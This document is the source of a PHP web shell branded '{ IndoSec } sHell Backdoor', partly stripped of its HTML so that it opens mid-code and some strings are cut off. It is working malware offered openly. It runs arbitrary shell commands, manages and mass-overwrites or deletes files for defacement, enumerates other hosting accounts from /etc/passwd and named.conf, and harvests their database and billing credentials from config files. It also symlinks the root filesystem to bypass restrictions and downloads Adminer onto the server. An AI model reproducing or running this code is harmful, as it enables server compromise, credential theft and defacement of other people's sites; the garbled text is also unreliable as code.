{ INDOSEC }

sHell Backdoor

Please Login

Copyright 2019 @ { IndoSec } ".$perm.''; } else { return "".$perm.''; } } function r($dir, $perm) { if (!is_readable($dir)) { return ''.$perm.''; } else { return ''.$perm.''; } } function exe($cmd) { if (function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists('exec')) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } if (isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); } $os = php_uname(); $ip = gethostbyname(gethostname()); $ver = phpversion(); $web = $_SERVER['HTTP_HOST']; $sof = $_SERVER['SERVER_SOFTWARE']; $dir = str_replace('\\', '/', $dir); $scdir = explode('/', $dir); $mysql = (function_exists('mysqli_connect')) ? 'ON' : 'OFF'; $curl = (function_exists('curl_version')) ? 'ON' : 'OFF'; $mail = (function_exists('mail')) ? 'ON' : 'OFF'; $total = disk_total_space($dir); $free = disk_free_space($dir); $pers = (int) ($free / $total * 100); $ds = @ini_get('disable_functions'); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $imgfol = ""; $imgfile = ""; function formatSize($bytes) { $types = ['B', 'KB', 'MB', 'GB', 'TB']; for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); return round($bytes, 2).' '.$types[$i]; } function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === false) { return false; } if (strpos($param, $kata2) === false) { return false; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } $d0mains = @file('/etc/named.conf', false); if (!$d0mains) { $dom = 'Cant Read [ /etc/named.conf ]'; $GLOBALS['need_to_update_header'] = 'true'; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, 'zone')) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "$count Domain"; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = []; $lll = []; while ($npage <= $npages) { $x = getsource('http://www.bing.com/search?q='.$dork.'&first='.$npage); if ($x) { preg_match_all('#

Swal.fire({ title: '$swa', text: '$text', type: '$swa', }).then((value) => {window.location='?dir=$dir';})"; } function about() { echo '

{ IndoSec }

{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.

Copyright 2019 { IndoSec }

'; exit; } function aksiUpload($dir) { echo '

//Multiple Upload

'; if (isset($_POST['upload'])) { $jumlah = count($_FILES['file']['name']); for ($i = 0; $i < $jumlah; $i++) { $filename = $_FILES['file']['name'][$i]; $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename); } if ($jumlah < 2) { if ($up) { $swa = 'success'; $text = "Berhasil Upload $filename"; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Upload File'; swall($swa, $text, $dir); } } else { $swa = 'success'; $text = "Berhasil Upload $jumlah File"; swall($swa, $text, $dir); } } } function chmodFile($dir, $file, $nfile) { echo "
Chmod File : $nfile
"; if (isset($_POST['perm'])) { if (@chmod($_GET['file'], $_POST['perm'])) { echo 'Change Permission Berhasil
'; } else { echo 'Change Permission Gagal
'; } } } function buatFile($dir, $imgfile) { echo "

$imgfile Buat File :



"; if (isset($_POST['bikin'])) { $name = $_POST['nama_file']; $isi_file = $_POST['isi_file']; foreach ($name as $nama_file) { $handle = @fopen("$nama_file", 'w'); if ($isi_file) { $buat = @fwrite($handle, $isi_file); } else { $buat = $handle; } } if ($buat) { $swa = 'success'; $text = 'Berhasil Membuat File'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Membuat File'; swall($swa, $text, $dir); } } } function view($dir, $file, $nfile, $imgfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]

'.$imgfile.' Lihat File : '.$nfile.'
'; $is_image = @getimagesize($file); if (is_array($is_image)) { $source = base64_encode(file_get_contents($file)); echo '

Type: '.$is_image['mime'].' | Size: '.$is_image['0'].' x '.$is_image['1']."

$nfile"; } else { echo '
'; } } function editFile($dir, $file, $nfile, $imgfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; $is_image = @getimagesize($file); echo "
$imgfile Edit File : $nfile
"; if (is_array($is_image)) { echo '
Tidak dapat mengedit gambar
'; } else { echo "
"; } echo '
'; if (isset($_POST['edit_file'])) { $updt = fopen("$file", 'w'); $hasil = fwrite($updt, $_POST['isi']); if ($hasil) { $swa = 'success'; $text = 'Berhasil Update File'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Update File'; swall($swa, $text, $dir); } } } function renameFile($dir, $file, $nfile, $imgfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "
$imgfile Rename File : $nfile

"; if (isset($_POST['rename_file'])) { $lama = $file; $baru = $_POST['namanew']; rename($baru, $lama); if (file_exists($baru)) { $swa = 'success'; $text = "Nama $baru Telah Digunakan"; swall($swa, $text, $dir); } else { if (rename($lama, $baru)) { $swa = 'success'; $text = "Berhasil Mengganti Nama Menjadi $baru"; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Mengganti Nama'; swall($swa, $text, $dir); } } } } function hapusFile($dir, $file, $nfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "

Yakin Menghapus : $nfile

Tidak
"; if ($_POST['ya']) { if (unlink($file)) { $swa = 'success'; $text = 'Berhasil Menghapus File'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Menghapus File'; swall($swa, $text, $dir); } } } function chmodFolder($dir, $ndir) { echo "
Chmod Folder : $ndir
"; if (isset($_POST['chmo'])) { if (@chmod($dir.'/'.$ndir, $_POST['perm'])) { echo 'Change Permission Berhasil
'; } else { echo 'Change Permission Gagal
'; } } } function buatFolder($dir, $imgfol) { echo "
$imgfol Buat Folder :

"; if (isset($_POST['buat'])) { $nama = $_POST['nama_folder']; foreach ($nama as $nama_folder) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder); $fd = @mkdir($folder); } if ($fd) { $swa = 'success'; $text = 'Berhasil Membuat Folder'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Membuat Folder'; swall($swa, $text, $dir); } } } function renameFolder($dir, $ndir, $imgfol) { $target = $dir.'/'.$ndir; echo "[ Rename ] [ Delete ]
$imgfol Rename Folder : $ndir


"; if (isset($_POST['ganti'])) { $baru = htmlspecialchars($_POST['namanew']); $ubah = rename($target, ''.$dir.'/'.$baru.''); if ($ubah) { $swa = 'success'; $text = 'Berhasil Mengganti Nama'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Mengganti Nama'; swall($swa, $text, $dir); } } } function deleteFolder($dir, $ndir) { $target = $dir.'/'.$ndir; echo "[ Rename ] [ Delete ]

Apakah Yakin Menghapus : $ndir ?

Tidak

"; if ($_POST['ya']) { if (is_dir($target)) { if (is_writable($target)) { @rmdir($target); @exe("rm -rf $target"); @exe("rmdir /s /q $target"); $swa = 'success'; $text = 'Berhasil Menghapus'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Berhasil Menghapus'; swall($swa, $text, $dir); } } } } function aksiMasdef($dir, $file, $imgfol, $imgfile) { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > $lokasi\n"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > $dirb/$namafile\n"; file_put_contents($lokasi, $isi_script); } } } } } } if ($_POST['start']) { echo "[ Kembali ]
'; } else { echo "
Tipe :
$imgfol Lokasi :

$imgfile Nama File :

$imgfile Isi File :

"; } exit; } function aksiMasdel($dir, $file, $imgfol, $imgfile) { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { if (file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif ($dirb === '..') { if (file_exists(''.dirname($dir)."/$namafile")) { unlink(''.dirname($dir)."/$namafile"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "$lokasi > Terhapus\n"; unlink($lokasi); $massdel = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST['start']) { echo "[ Kembali ]
'; } else { echo "
$imgfol Lokasi :

$imgfile Nama File :

"; } exit; } function aksiJump($dir, $file, $ip) { $i = 0; echo "
"; if (preg_match('/hsphere/', $dir)) { $urls = explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { echo '
';
            foreach ($urls as $url) {
                $url = str_replace(['http://', 'www.'], '', strtolower($url));
                $etc = '/etc/passwd';
                $f = fopen($etc, 'r');
                while ($gets = fgets($f)) {
                    $pecah = explode(':', $gets);
                    $user = $pecah[0];
                    $dir_user = "/hsphere/local/home/$user";
                    if (is_dir($dir_user) === true) {
                        $url_user = $dir_user.'/'.$url;
                        if (is_readable($url_user)) {
                            $i++;
                            $jrw = "[R] $url_user";
                            if (is_writable($url_user)) {
                                $jrw = "[RW] $url_user";
                            }
                            echo $jrw.'
';
                        }
                    }
                }
            }
            if (!$i == 0) {
                echo "
Total ada $i KAMAR di $ip";
            }
            echo '
'; } else { echo '
List Domains:

'; } } elseif (preg_match('/vhosts/', $dir)) { $urls = explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { echo '
';
            foreach ($urls as $url) {
                $web_vh = "/var/www/vhosts/$url/httpdocs";
                if (is_dir($web_vh) === true) {
                    if (is_readable($web_vh)) {
                        $i++;
                        $jrw = "[R] $web_vh";
                        if (is_writable($web_vh)) {
                            $jrw = "[RW] $web_vh";
                        }
                        echo $jrw.'
';
                    }
                }
            }
            if (!$i == 0) {
                echo "
Total ada $i Kamar Di $ip";
            }
            echo '
'; } else { echo '
List Domains:

'; } } else { echo '
';
        $etc = fopen('/etc/passwd', 'r') or die("Can't read /etc/passwd
");
        while ($passwd = fgets($etc)) {
            if ($passwd == '' || !$etc) {
                echo "Can't read /etc/passwd
";
            } else {
                preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
                foreach ($user_jumping[1] as $user_pro_jump) {
                    $user_jumping_dir = "/home/$user_pro_jump/public_html";
                    if (is_readable($user_jumping_dir)) {
                        $i++;
                        $jrw = "[R] $user_jumping_dir";
                        if (is_writable($user_jumping_dir)) {
                            $jrw = "[RW] $user_jumping_dir";
                        }
                        echo $jrw;
                        if (function_exists('posix_getpwuid')) {
                            $domain_jump = file_get_contents('/etc/named.conf');
                            if ($domain_jump == '') {
                                echo ' => ( gabisa ambil nama domain nya )
';
                            } else {
                                preg_match_all('#/var/named/(.*?).db#', $domain_jump, $domains_jump);
                                foreach ($domains_jump[1] as $dj) {
                                    $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
                                    $user_jumping_url = $user_jumping_url['name'];
                                    if ($user_jumping_url == $user_pro_jump) {
                                        echo " => ( $dj )
";
                                        break;
                                    }
                                }
                            }
                        } else {
                            echo '
';
                        }
                    }
                }
            }
        }
        if (!$i == 0) {
            echo "
Total ada $i kamar di $ip";
        }
        echo '
'; } echo '

'; exit; } function aksiConfig($dir, $file) { if ($_POST) { $passwd = $_POST['passwd']; mkdir('indosec_config', 0777); $isi_htc = 'Options allnRequire NonenSatisfy Any'; $htc = fopen('indosec_config/.htaccess', 'w'); fwrite($htc, $isi_htc); preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach ($user_config[1] as $user_con) { $user_config_dir = "/home/$user_con/public_html/"; if (is_readable($user_config_dir)) { $grab_config = [ "/home/$user_con/.my.cnf" => 'cpanel', "/home/$user_con/public_html/config/koneksi.php" => 'Lokomedia', "/home/$user_con/public_html/forum/config.php" => 'phpBB', "/home/$user_con/public_html/sites/default/settings.php" => 'Drupal', "/home/$user_con/public_html/config/settings.inc.php" => 'PrestaShop', "/home/$user_con/public_html/app/etc/local.xml" => 'Magento', "/home/$user_con/public_html/admin/config.php" => 'OpenCart', "/home/$user_con/public_html/application/config/database.php" => 'Ellislab', "/home/$user_con/public_html/vb/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/forum/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/forums/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/cc/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/inc/config.php" => 'MyBB', "/home/$user_con/public_html/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/shop/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/os/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/oscom/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/products/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/cart/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/inc/conf_global.php" => 'IPB', "/home/$user_con/public_html/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wp/test/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/blog/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/beta/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/portal/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/site/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wp/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/WP/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/news/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wordpress/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/test/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/demo/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/home/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/v1/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/v2/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/press/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/new/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/blogs/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/configuration.php" => 'Joomla', "/home/$user_con/public_html/blog/configuration.php" => 'Joomla', "/home/$user_con/public_html/submitticket.php" => '^WHMCS', "/home/$user_con/public_html/cms/configuration.php" => 'Joomla', "/home/$user_con/public_html/beta/configuration.php" => 'Joomla', "/home/$user_con/public_html/portal/configuration.php" => 'Joomla', "/home/$user_con/public_html/site/configuration.php" => 'Joomla', "/home/$user_con/public_html/main/configuration.php" => 'Joomla', "/home/$user_con/public_html/home/configuration.php" => 'Joomla', "/home/$user_con/public_html/demo/configuration.php" => 'Joomla', "/home/$user_con/public_html/test/configuration.php" => 'Joomla', "/home/$user_con/public_html/v1/configuration.php" => 'Joomla', "/home/$user_con/public_html/v2/configuration.php" => 'Joomla', "/home/$user_con/public_html/joomla/configuration.php" => 'Joomla', "/home/$user_con/public_html/new/configuration.php" => 'Joomla', "/home/$user_con/public_html/WHMCS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs1/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/WHMC/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whmc/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmc/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/WHM/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/HOST/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Host/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/host/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SUPPORTES/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Supportes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/supportes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/domains/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/domain/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Hosting/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/HOSTING/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/hosting/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CART/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Cart/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/cart/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ORDER/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Client/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/client/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clientarea/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientarea/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SUPPORT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Support/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/support/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLING/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billing/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billing/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BUY/sumitticket.php" => 'WHMCS', "/home/$user_con/public_html/Buy/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/buy/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/MANAGE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Manage/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/manage/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ClientSupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clientsupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientsupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CHECKOUT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Checkout/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/checkout/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLINGS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BASKET/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Basket/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/basket/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SECURE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Secure/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SALES/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Sales/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/sales/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILL/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Bill/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/bill/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/PURCHASE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Purchase/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/purchase/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ACCOUNT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Account/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/account/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/USER/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/User/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/user/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clients/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clients/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLINGS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/MY/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/My/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/my/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/panel/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/cliente/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/support/order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/boxbilling/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/box/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/host/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/Host/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/supportes/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/support/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/hosting/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/cart/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/order/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/client/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/clients/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/cliente/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/clientes/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/billing/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/billings/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/my/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/secure/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/support/order/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/zencart/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/products/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/cart/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/shop/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/hostbills/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/host/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/Host/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/supportes/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/support/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/hosting/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/cart/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/order/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/client/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/clients/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/cliente/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/clientes/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/billing/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/billings/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/my/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/secure/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/support/order/includes/iso4217.php" => 'Hostbills', ]; foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("indosec_config/$user_con-$nama_config.txt", 'w'); fwrite($file_config, $ambil_config); } } } } echo "

Success Get Config!!

Click Here"; } else { echo "

/etc/passwd error ? Bypass Here


"; } exit; } function aksiBypasswd($dir, $file) { echo '

Bypass etc/passwd With :

Bypass User With :

'; $mail = 'ls /var/mail'; $paswd = '/etc/passwd'; if ($_POST['syst']) { echo"
'; } if ($_POST['passth']) { echo"
'; } if ($_POST['ex']) { echo"
'; } if ($_POST['shex']) { echo"
'; } if ($_POST['melex']) { echo"
'; } if ($_POST['awkuser']) { echo"
'; } if ($_POST['systuser']) { echo"
'; } if ($_POST['passthuser']) { echo"
'; } if ($_POST['exuser']) { echo"
'; } if ($_POST['shexuser']) { echo"
'; } echo '
'; exit; } function aksiAdminer($dir, $file) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, 'w'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists('adminer.php')) { echo "Login Adminer"; } else { if (adminer('https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php', 'adminer.php')) { echo "

Berhasil Membuat Adminer

Login Adminer"; } else { echo "

Gagal Membuat Adminer

"; } } exit; } function aksiSym($dir, $file) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir); $d0mains = @file('/etc/named.conf'); if (!$d0mains) { die("[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
Error tidak dapat membaca /etc/named.conf

"); } //#htaccess if ($d0mains) { @mkdir('indosec_sym', 0777); @chdir('indosec_sym'); @exe('ln -s / root'); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi('zone', $d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domains[1][0])); echo '"; flush(); $dcount++; } } } echo '
No. Domains Users symlink
'.$dcount." '.$domains[1][0].' '.$user['name']." Symlink
